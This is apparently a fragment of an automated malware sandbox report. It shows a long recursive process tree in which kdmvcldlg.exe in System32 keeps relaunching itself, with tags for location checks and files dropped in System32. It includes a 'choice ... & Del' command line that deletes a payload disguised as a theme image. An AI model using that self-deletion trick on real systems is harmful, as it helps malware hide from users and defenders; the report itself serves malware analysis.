C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 379⤵PID:2276
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"78⤵
- Checks computer location settings
PID:17788 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"79⤵PID:18216
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 380⤵PID:5848
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"79⤵PID:4448
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"80⤵PID:3796
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 381⤵PID:2196
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"80⤵PID:4592
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"81⤵
- Checks computer location settings
PID:6344 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"82⤵PID:7548
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"83⤵PID:3332
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"84⤵
- Checks computer location settings
- Drops file in System32 directory
PID:7896 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"85⤵PID:3472
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"86⤵PID:5088
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"87⤵
- Drops file in System32 directory
PID:8128 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"88⤵PID:3764
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"89⤵PID:8780
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"90⤵
- Drops file in System32 directory
PID:5600 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"91⤵PID:4072
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"92⤵
- Checks computer location settings
PID:6616 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"93⤵
- Drops file in System32 directory
PID:7792 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"94⤵PID:6252
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"95⤵PID:13056
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"96⤵PID:6504
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"97⤵PID:4588
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"98⤵PID:14896
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"99⤵PID:5368
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"100⤵PID:18296
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"101⤵PID:18084
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"102⤵PID:6592
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"103⤵PID:6320
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"104⤵PID:7012
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"105⤵PID:664
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"106⤵
- Checks computer location settings
PID:6924 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"107⤵PID:4080
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"108⤵
- Checks computer location settings
PID:5176 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"109⤵PID:5160
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"110⤵
- Drops file in System32 directory
PID:5780 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"111⤵
- Checks computer location settings
PID:1436 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"112⤵PID:7404
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"113⤵PID:928
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"114⤵PID:9344
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"115⤵PID:7768
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"116⤵PID:1836
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"117⤵PID:7400
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"118⤵PID:8924
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"119⤵
- Checks computer location settings
PID:7152 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"120⤵
- Checks computer location settings
- Drops file in System32 directory
PID:7052 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"121⤵
- Checks computer location settings
PID:6040 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"122⤵PID:1576
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-